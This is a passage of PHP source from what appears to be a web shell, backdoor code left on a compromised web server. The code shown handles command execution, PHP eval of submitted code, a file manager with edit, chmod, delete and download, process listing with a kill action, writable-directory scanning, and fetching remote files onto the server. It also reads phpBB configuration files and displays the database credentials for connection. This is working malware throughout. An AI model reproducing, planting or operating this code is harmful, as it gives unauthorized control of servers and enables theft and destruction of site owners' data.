if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} | |
$x = "ls"; | |
} | |
} | |
if ($x == "cmd") { | |
@chdir($chdir); | |
if (!empty($submit)) { | |
echo "<div class=barheader>.: Result of Command Execution :.</div>"; | |
$olddir = realpath("."); | |
@chdir($d); | |
$ret = myshellexec($cmd); | |
$ret = convert_cyr_string($ret,"d","w"); | |
if ($cmd_txt) { | |
$rows = count(explode("\r\n",$ret))+1; | |
if ($rows < 10) {$rows = 10; } | |
if ($msie) { $cols = 113; } | |
else { $cols = 117;} | |
echo "<div align=left><pre>".htmlspecialchars($ret)."</pre></div>"; | |
} | |
else {echo $ret."<br>";} | |
@chdir($olddir); | |
} | |
else { | |
echo "<b>Command Execution</b>"; | |
if (empty($cmd_txt)) {$cmd_txt = TRUE;} | |
} | |
} | |
if ($x == "ls") { | |
if (count($ls_arr) > 0) { $list = $ls_arr; } | |
else { | |
$list = array(); | |
if ($h = @opendir($d)) { | |
while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} | |
closedir($h); | |
} | |
} | |
if (count($list) == 0) { echo "<div class=fxerrmsg>Can't open folder (".htmlspecialchars($d).")!</div>";} | |
else { | |
$objects = array(); | |
$vd = "f"; | |
if ($vd == "f") { | |
$objects["head"] = array(); | |
$objects["folders"] = array(); | |
$objects["links"] = array(); | |
$objects["files"] = array(); | |
foreach ($list as $v) { | |
$o = basename($v); | |
$row = array(); | |
if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";} | |
elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";} | |
elseif (is_dir($v)) { | |
if (is_link($v)) {$type = "LINK";} | |
else {$type = "DIR";} | |
$row[] = $v; | |
$row[] = $type; | |
} | |
elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} | |
$row[] = filemtime($v); | |
if (!$win) { | |
$ow = posix_getpwuid(fileowner($v)); | |
$gr = posix_getgrgid(filegroup($v)); | |
$row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); | |
} | |
$row[] = fileperms($v); | |
if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} | |
elseif (is_link($v)) {$objects["links"][] = $row;} | |
elseif (is_dir($v)) {$objects["folders"][] = $row;} | |
elseif (is_file($v)) {$objects["files"][] = $row;} | |
$i++; | |
} | |
$row = array(); | |
$row[] = "<b>Name</b>"; | |
$row[] = "<b>Size</b>"; | |
$row[] = "<b>Date Modified</b>"; | |
if (!$win) {$row[] = "<b>Owner/Group</b>";} | |
$row[] = "<b>Perms</b>"; | |
$row[] = "<b>Action</b>"; | |
$parsesort = parsesort($sort); | |
$sort = $parsesort[0].$parsesort[1]; | |
$k = $parsesort[0]; | |
if ($parsesort[1] != "a") {$parsesort[1] = "d";} | |
$y = " <a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; | |
$y .= "<img src=\"".$surl."x=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; | |
$row[$k] .= $y; | |
for($i=0;$i<count($row)-1;$i++) { | |
if ($i != $k) {$row[$i] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} | |
} | |
$v = $parsesort[0]; | |
usort($objects["folders"], "tabsort"); | |
usort($objects["links"], "tabsort"); | |
usort($objects["files"], "tabsort"); | |
if ($parsesort[1] == "d") { | |
$objects["folders"] = array_reverse($objects["folders"]); | |
$objects["files"] = array_reverse($objects["files"]); | |
} | |
$objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); | |
$tab = array(); | |
$tab["cols"] = array($row); | |
$tab["head"] = array(); | |
$tab["folders"] = array(); | |
$tab["links"] = array(); | |
$tab["files"] = array(); | |
$i = 0; | |
foreach ($objects as $a) { | |
$v = $a[0]; | |
$o = basename($v); | |
$dir = dirname($v); | |
if ($disp_fullpath) {$disppath = $v;} | |
else {$disppath = $o;} | |
$disppath = str2mini($disppath,60); | |
if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} | |
elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} | |
foreach ($regxp_highlight as $r) { | |
if (ereg($r[0],$o)) { | |
if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; capriv8exit();} | |
else { | |
$r[1] = round($r[1]); | |
$isdir = is_dir($v); | |
if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) { | |
if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} | |
$disppath = $r[2].$disppath.$r[3]; | |
if ($r[4]) {break;} | |
} | |
} | |
} | |
} | |
$uo = urlencode($o); | |
$ud = urlencode($dir); | |
$uv = urlencode($v); | |
$row = array(); | |
if ($o == ".") { | |
$row[] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."x=img&img=small_dir\" border=\"0\"> ".$o."</a>"; | |
$row[] = "CURDIR"; | |
} | |
elseif ($o == "..") { | |
$row[] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."x=img&img=ext_lnk\" border=\"0\"> ".$o."</a>"; | |
$row[] = "UPDIR"; | |
} | |
elseif (is_dir($v)) { | |
if (is_link($v)) { | |
$disppath .= " => ".readlink($v); | |
$type = "LINK"; | |
$row[] = "<a href=\"".$surl."x=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."x=img&img=ext_lnk\" border=\"0\"> [".$disppath."]</a>"; | |
} | |
else { | |
$type = "DIR"; | |
$row[] = "<a href=\"".$surl."x=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."x=img&img=small_dir\" border=\"0\"> [".$disppath."]</a>"; | |
} | |
$row[] = $type; | |
} | |
elseif(is_file($v)) { | |
$ext = explode(".",$o); | |
$c = count($ext)-1; | |
$ext = $ext[$c]; | |
$ext = strtolower($ext); | |
$row[] = "<a href=\"".$surl."x=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."x=img&img=ext_".$ext."\" border=\"0\"> ".$disppath."</a>"; | |
$row[] = view_size($a[1]); | |
} | |
$row[] = date("d.m.Y H:i:s",$a[2]); | |
if (!$win) {$row[] = $a[3];} | |
$row[] = "<a href=\"".$surl."x=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; | |
if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} | |
else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} | |
if (is_dir($v)) {$row[] = "<a href=\"".$surl."x=d&d=".$uv."\"><img src=\"".$surl."x=img&img=ext_diz\" alt=\"Info\" border=\"0\"></a> ".$checkbox;} | |
else {$row[] = "<a href=\"".$surl."x=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."x=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a> <a href=\"".$surl."x=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."x=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a> <a href=\"".$surl."x=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."x=img&img=download\" alt=\"Download\" border=\"0\"></a> ".$checkbox;} | |
if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} | |
elseif (is_link($v)) {$tab["links"][] = $row;} | |
elseif (is_dir($v)) {$tab["folders"][] = $row;} | |
elseif (is_file($v)) {$tab["files"][] = $row;} | |
$i++; | |
} | |
} | |
$table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); | |
echo "<div class=barheader>.: "; | |
if (!empty($fx_infohead)) { echo $fx_infohead; } | |
else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; } | |
echo " :.</div>\n"; | |
echo "<form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=x value=\"".$dspact."\"><input type=hidden name=d value=".$d.">". | |
"<table class=explorer>"; | |
foreach($table as $row) { | |
echo "<tr>"; | |
foreach($row as $v) {echo "<td>".$v."</td>";} | |
echo "</tr>\r\n"; | |
} | |
echo "</table>". | |
"<script>". | |
"function ls_setcheckboxall(status) {". | |
" var id = 1; var num = ".(count($table)-2).";". | |
" while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; }". | |
"}". | |
"function ls_reverse_all() {". | |
" var id = 1; var num = ".(count($table)-2).";". | |
" while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; }". | |
"}". | |
"</script>". | |
"<div align=\"right\">". | |
"<input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\"> <input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">". | |
"<img src=\"".$surl."x=img&img=arrow_ltr\" border=\"0\">"; | |
if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) { | |
echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\"> <input type=\"text\" name=\"actarcbuff_path\" value=\"fx_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\"> <input type=submit name=\"actpastebuff\" value=\"Paste\"> <input type=submit name=\"actemptybuff\" value=\"Empty buffer\"> "; | |
} | |
echo "<select name=x><option value=\"".$x."\">With selected:</option>"; | |
echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; | |
echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; | |
if ($usefsbuff) { | |
echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; | |
echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; | |
echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; | |
} | |
echo "</select> <input type=submit value=\"Confirm\"></div>"; | |
echo "</form>"; | |
} | |
} | |
if ($x == "tools") | |
{ | |
} | |
if ($x == "phpfsys") { | |
echo "<div align=left>"; | |
$fsfunc = $phpfsysfunc; | |
if ($fsfunc=="copy") { | |
if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";} | |
else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; } | |
} | |
elseif ($fsfunc=="rename") { | |
if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";} | |
else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; } | |
} | |
elseif ($fsfunc=="chmod") { | |
if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";} | |
else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; } | |
} | |
elseif ($fsfunc=="read") { | |
$hasil = @file_get_contents($arg1); | |
echo "<b>Filename:</b> $arg1<br>"; | |
echo "<textarea cols=150 rows=20>"; | |
echo $hasil; | |
echo "</textarea>\n"; | |
} | |
elseif ($fsfunc=="write") { | |
if(@file_put_contents($d.$arg1,$arg2)) { | |
echo "<b>Saved!</b> ".$d.$arg1; | |
} | |
else { echo "<div class=fxerrmsg>Couldn't write to $arg1!</div>"; } | |
} | |
elseif ($fsfunc=="downloadbin") { | |
$handle = fopen($arg1, "rb"); | |
$contents = ''; | |
while (!feof($handle)) { | |
$contents .= fread($handle, 8192); | |
} | |
$r = @fopen($d.$arg2,'w'); | |
if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; } | |
else { echo "<div class=fxerrmsg>Couldn't write to ".$d.$arg2."!</div>"; } | |
fclose($r); | |
fclose($handle); | |
} | |
elseif ($fsfunc=="download") { | |
$text = implode('', file($arg1)); | |
if ($text) { | |
$r = @fopen($d.$arg2,'w'); | |
if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; } | |
else { echo "<div class=fxerrmsg>Couldn't write to ".$d.$arg2."!</div>"; } | |
fclose($r); | |
} | |
else { echo "<div class=fxerrmsg>Couldn't download from $arg1!</div>";} | |
} | |
elseif ($fsfunc=='mkdir') { | |
$thedir = $d.$arg1; | |
if ($thedir != $d) { | |
if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); } | |
elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); } | |
else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);} | |
} | |
else { echo "Couldn't create current dir:<b> $thedir</b>"; } | |
} | |
elseif ($fsfunc=='fwritabledir') { | |
function recurse_dir($dir,$max_dir) { | |
global $dir_count; | |
$dir_count++; | |
if( $cdir = @dir($dir) ) { | |
while( $entry = $cdir-> read() ) { | |
if( $entry != '.' && $entry != '..' ) { | |
if(is_dir($dir.$entry) && is_writable($dir.$entry) ) { | |
if ($dir_count > $max_dir) { return; } | |
echo "[".$dir_count."] ".$dir.$entry."\n"; | |
recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir); | |
} | |
} | |
} | |
$cdir->close(); | |
} | |
} | |
if (!$arg1) { $arg1 = $d; } | |
if (!$arg2) { $arg2 = 10; } | |
echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<br>"; | |
echo "<pre>"; | |
recurse_dir($arg1,$arg2); | |
echo "</pre>"; | |
$total = $dir_count - 1; | |
echo "<b>Founds:</b> ".$total." of <b>Max</b> $arg2"; | |
} | |
else { | |
if (!$arg1) { echo "<div class=fxerrmsg>No operation! Please fill parameter [A]!</div>\n"; } | |
else { | |
if ($hasil = $fsfunc($arg1)) { | |
echo "<b>Result of $fsfunc $arg1:</b><br>"; | |
if (!is_array($hasil)) { echo "$hasil\n"; } | |
else { | |
echo "<pre>"; | |
foreach ($hasil as $v) { echo $v."\n"; } | |
echo "</pre>"; | |
} | |
} | |
else { echo "<div class=fxerrmsg>$fsfunc $arg1 failed!</div>\n"; } | |
} | |
} | |
echo "</div>\n"; | |
} | |
if ($x == "processes") { | |
echo "<div class=barheader>.: Processes :.</div>"; | |
if (!$win) { $handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":""); } | |
else { $handler = "tasklist"; } | |
$ret = myshellexec($handler); | |
if (!$ret) { echo "Can't execute \"".$handler."\"!"; } | |
else { | |
if (empty($processes_sort)) {$processes_sort = $sort_default;} | |
$parsesort = parsesort($processes_sort); | |
if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} | |
$k = $parsesort[0]; | |
if ($parsesort[1] != "a") { | |
$y = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."x=img&img=sort_desc\" border=\"0\"></a>"; | |
} | |
else { | |
$y = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."x=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>"; | |
} | |
$ret = htmlspecialchars($ret); | |
if (!$win) { | |
if ($pid) { | |
if (is_null($sig)) {$sig = 9;} | |
echo "Sending signal ".$sig." to #".$pid."... "; | |
if (posix_kill($pid,$sig)) {echo "OK.";} | |
else {echo "ERROR.";} | |
} | |
while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | |
$stack = explode("\n",$ret); | |
$head = explode(" ",$stack[0]); | |
unset($stack[0]); | |
for($i=0;$i<count($head);$i++) { | |
if ($i != $k) {$head[$i] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} | |
} | |
$prcs = array(); | |
foreach ($stack as $line) { | |
if (!empty($line)) { | |
echo "<tr>"; | |
$line = explode(" ",$line); | |
$line[10] = join(" ",array_slice($line,10)); | |
$line = array_slice($line,0,11); | |
if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} | |
$line[] = "<a href=\"".$surl."x=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; | |
$prcs[] = $line; | |
echo "</tr>"; | |
} | |
} | |
} | |
else { | |
while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | |
while (ereg("=",$ret)) {$ret = str_replace("=","",$ret);} | |
$ret = convert_cyr_string($ret,"d","w"); | |
$stack = explode("\n",$ret); | |
unset($stack[0],$stack[2]); | |
$stack = array_values($stack); | |
$stack[0]=str_replace("Image Name","ImageName",$stack[0]); | |
$stack[0]=str_replace("Session Name","SessionName",$stack[0]); | |
$stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]); | |
$head = explode(" ",$stack[0]); | |
$stack = array_slice($stack,1); | |
$head = array_values($head); | |
if ($parsesort[1] != "a") { $y = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."x=img&img=sort_desc\" border=\"0\"></a>"; } | |
else { $y = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."x=img&img=sort_asc\" border=\"0\"></a>"; } | |
if ($k > count($head)) {$k = count($head)-1;} | |
for($i=0;$i<count($head);$i++) { | |
if ($i != $k) { $head[$i] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; } | |
} | |
$prcs = array(); | |
unset($stack[0]); | |
foreach ($stack as $line) { | |
if (!empty($line)) { | |
$line = explode(" ",$line); | |
$line[4] = str_replace(".","",$line[4]); | |
$line[4] = intval($line[4]) * 1024; | |
unset($line[5]); | |
$prcs[] = $line; | |
} | |
} | |
} | |
$head[$k] = "<b>".$head[$k]."</b>".$y; | |
$v = $processes_sort[0]; | |
usort($prcs,"tabsort"); | |
if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} | |
$tab = array(); | |
$tab[] = $head; | |
$tab = array_merge($tab,$prcs); | |
echo "<table class=explorer>"; | |
foreach($tab as $i=>$k) { | |
echo "<tr>"; | |
foreach($k as $j=>$v) { | |
if ($win and $i > 0 and $j == 4) {$v = view_size($v);} | |
echo "<td>".$v."</td>"; | |
} | |
echo "</tr>"; | |
} | |
echo "</table>"; | |
} | |
} | |
if ($x == "eval") { | |
if (!empty($eval)) { | |
echo "Result of execution this PHP-code:<br>"; | |
$tmp = ob_get_contents(); | |
$olddir = realpath("."); | |
@chdir($d); | |
if ($tmp) { | |
ob_clean(); | |
eval($eval); | |
$ret = ob_get_contents(); | |
$ret = convert_cyr_string($ret,"d","w"); | |
ob_clean(); | |
echo $tmp; | |
if ($eval_txt) { | |
$rows = count(explode("\r\n",$ret))+1; | |
if ($rows < 10) {$rows = 10;} | |
echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; | |
} | |
else {echo $ret."<br>";} | |
} | |
else { | |
if ($eval_txt) { | |
echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; | |
eval($eval); | |
echo "</textarea>"; | |
} | |
else {echo $ret;} | |
} | |
@chdir($olddir); | |
} | |
else {echo "<b>PHP-code Execution (Use without PHP Braces!)</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} | |
echo "<form action=\"".$surl."\" method=POST><input type=hidden name=x value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; | |
} | |
if ($x == "f") { | |
echo "<div align=left>"; | |
if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") { | |
if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} | |
else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."x=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} | |
} | |
else { | |
$r = @file_get_contents($d.$f); | |
$ext = explode(".",$f); | |
$c = count($ext)-1; | |
$ext = $ext[$c]; | |
$ext = strtolower($ext); | |
$rft = ""; | |
foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} | |
if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} | |
if (empty($ft)) {$ft = $rft;} | |
$arr = array( | |
array("<img src=\"".$surl."x=img&img=ext_diz\" border=\"0\">","info"), | |
array("<img src=\"".$surl."x=img&img=ext_html\" border=\"0\">","html"), | |
array("<img src=\"".$surl."x=img&img=ext_txt\" border=\"0\">","txt"), | |
array("Code","code"), | |
array("Session","phpsess"), | |
array("<img src=\"".$surl."x=img&img=ext_exe\" border=\"0\">","exe"), | |
array("SDB","sdb"), | |
array("<img src=\"".$surl."x=img&img=ext_gif\" border=\"0\">","img"), | |
array("<img src=\"".$surl."x=img&img=ext_ini\" border=\"0\">","ini"), | |
array("<img src=\"".$surl."x=img&img=download\" border=\"0\">","download"), | |
array("<img src=\"".$surl."x=img&img=ext_rtf\" border=\"0\">","notepad"), | |
array("<img src=\"".$surl."x=img&img=change\" border=\"0\">","edit") | |
); | |
echo "<b>Viewing file: <img src=\"".$surl."x=img&img=ext_".$ext."\" border=\"0\"> ".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; | |
foreach($arr as $t) { | |
if ($t[1] == $rft) {echo " <a href=\"".$surl."x=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} | |
elseif ($t[1] == $ft) {echo " <a href=\"".$surl."x=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} | |
else {echo " <a href=\"".$surl."x=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} | |
echo " (<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; | |
} | |
echo "<hr size=\"1\" noshade>"; | |
if ($ft == "info") { | |
echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; | |
if (!$win) { | |
echo "<tr><td><b>Owner/Group</b></td><td> "; | |
$ow = posix_getpwuid(fileowner($d.$f)); | |
$gr = posix_getgrgid(filegroup($d.$f)); | |
echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); | |
} | |
echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."x=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>"; | |
$fi = fopen($d.$f,"rb"); | |
if ($fi) { | |
if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} | |
else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} | |
$n = 0; | |
$a0 = "00000000<br>"; | |
$a1 = ""; | |
$a2 = ""; | |
for ($i=0; $i<strlen($str); $i++) { | |
$a1 .= sprintf("%02X",ord($str[$i]))." "; | |
switch (ord($str[$i])) { | |
case 0: $a2 .= "<font>0</font>"; break; | |
case 32: | |
case 10: | |
case 13: $a2 .= " "; break; | |
default: $a2 .= htmlspecialchars($str[$i]); | |
} | |
$n++; | |
if ($n == $hexdump_rows) { | |
$n = 0; | |
if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} | |
$a1 .= "<br>"; | |
$a2 .= "<br>"; | |
} | |
} | |
echo "<table border=1 bgcolor=#666666>". | |
"<tr><td bgcolor=#666666>".$a0."</td>". | |
"<td bgcolor=#000000>".$a1."</td>". | |
"<td bgcolor=#000000>".$a2."</td>". | |
"</tr></table><br>"; | |
} | |
$encoded = ""; | |
if ($base64 == 1) { | |
echo "<b>Base64 Encode</b><br>"; | |
$encoded = base64_encode(file_get_contents($d.$f)); | |
} | |
elseif($base64 == 2) { | |
echo "<b>Base64 Encode + Chunk</b><br>"; | |
$encoded = chunk_split(base64_encode(file_get_contents($d.$f))); | |
} | |
elseif($base64 == 3) { | |
echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; | |
$encoded = base64_encode(file_get_contents($d.$f)); | |
$encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); | |
} | |
elseif($base64 == 4) { | |
$text = file_get_contents($d.$f); | |
$encoded = base64_decode($text); | |
echo "<b>Base64 Decode"; | |
if (base64_encode($encoded) != $text) {echo " (failed)";} | |
echo "</b><br>"; | |
} | |
if (!empty($encoded)) | |
{ | |
echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; | |
} | |
echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> | |
<nobr>[<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>] </nobr> | |
<nobr>[<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>] </nobr> | |
<nobr>[<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>] </nobr> | |
<nobr>[<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>] </nobr> | |
<P>"; | |
} | |
elseif ($ft == "html") { | |
if ($white) {@ob_clean();} | |
echo $r; | |
if ($white) {capriv8exit();} | |
} | |
elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} | |
elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} | |
elseif ($ft == "phpsess") { | |
echo "<pre>"; | |
$v = explode("|",$r); | |
echo $v[0]."<br>"; | |
var_dump(unserialize($v[1])); | |
echo "</pre>"; | |
} | |
elseif ($ft == "exe") { | |
$ext = explode(".",$f); | |
$c = count($ext)-1; | |
$ext = $ext[$c]; | |
$ext = strtolower($ext); | |
$rft = ""; | |
foreach($exeftypes as $k=>$v) | |
{ | |
if (in_array($ext,$v)) {$rft = $k; break;} | |
} | |
$cmd = str_replace("%f%",$f,$rft); | |
echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=x value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; | |
} | |
elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} | |
elseif ($ft == "code") { | |
if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) { | |
$arr = explode("\n",$r); | |
if (count($arr == 18)) { | |
include($d.$f); | |
echo "<b>phpBB configuration is detected in this file!<br>"; | |
if ($dbms == "mysql4") {$dbms = "mysql";} | |
if ($dbms == "mysql") {echo "<a href=\"".$surl."x=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} | |
else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$sh_name.". Please, report us for fix.";} | |
echo "Parameters for manual connect:<br>"; | |
$cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); | |
foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} | |
echo "</b><hr size=\"1\" noshade>"; | |
} | |
} | |
echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; | |
if (!empty($white)) {@ob_clean();} | |
highlight_file($d.$f); | |
if (!empty($white)) {capriv8exit();} | |
echo "</div>"; | |
} | |
elseif ($ft == "download") { | |
@ob_clean(); | |
header("Content-type: application/octet-stream"); | |
header("Content-length: ".filesize($d.$f)); | |
header("Content-disposition: attachment; filename=\"".$f."\";"); | |
echo $r; | |
exit; | |
} | |
